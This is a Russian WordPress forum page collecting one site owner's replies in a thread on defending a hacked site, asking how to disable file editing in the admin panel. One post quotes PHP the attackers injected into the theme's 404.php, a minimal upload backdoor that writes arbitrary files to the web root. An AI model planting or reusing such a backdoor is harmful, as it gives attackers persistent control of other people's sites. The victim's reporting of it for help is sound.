a-a-u@mail.ru
Ответы в темах
-
Форум: Проблемы и решения
Тема: Защита wp от взломаУ вас задан для сайта простой логин и пароль, такой как admin и 123456 и разрешено изменение php файлов через редактор WordPress?
Логин менял пароль не сильно сложный но не стандартный набор букв и цифр. Последние разы, когда взламывали площадки меняли логин администратора на свой, пароль тоже скорее всего меняли.
А вот редактирование файлов через админку открыто, подскажите, как это можно закрыть ?
Форум: Проблемы и решения
Тема: Защита wp от взломаНашел где это прописано. В файле 404.php прописали:
<?php
if(isset($_POST[‘Submit’])){
$filedir = «»;
$maxfile = ‘2000000’;
$userfile_name = $_FILES[‘image’][‘name’];
$userfile_tmp = $_FILES[‘image’][‘tmp_name’];
if (isset($_FILES[‘image’][‘name’])) {
$abod = $filedir.$userfile_name;
@move_uploaded_file($userfile_tmp, $abod);
echo»<center><b>Done ==></b>$userfile_name</center>»;
}
}else{
echo’
<form method=»POST» action=»» enctype=»multipart/form-data»><input type=»file» name=»image»><input type=»Submit» name=»Submit» value=»UPLOAD!»></form>’;}
?>Форум: Проблемы и решения
Тема: Защита wp от взломаВ том то и дело 🙂 сам удивляюсь. Штатный файл wp-load.php дает пустую страницу, а запрос /wp-load даёт такую возможность. Сайт взломали вчера, я менял Url для доступа в админку и заметил такую вещь. 🙂 эта страница начала выводиться по запросу /wp-admin/
Системные файлы вроде бы обновил, но проблема осталась.
Форум: Проблемы и решения
Тема: Защита wp от взломаточнее имясайта.ru/wp-load даёт возможность из вне загружать файлы в корневую папку.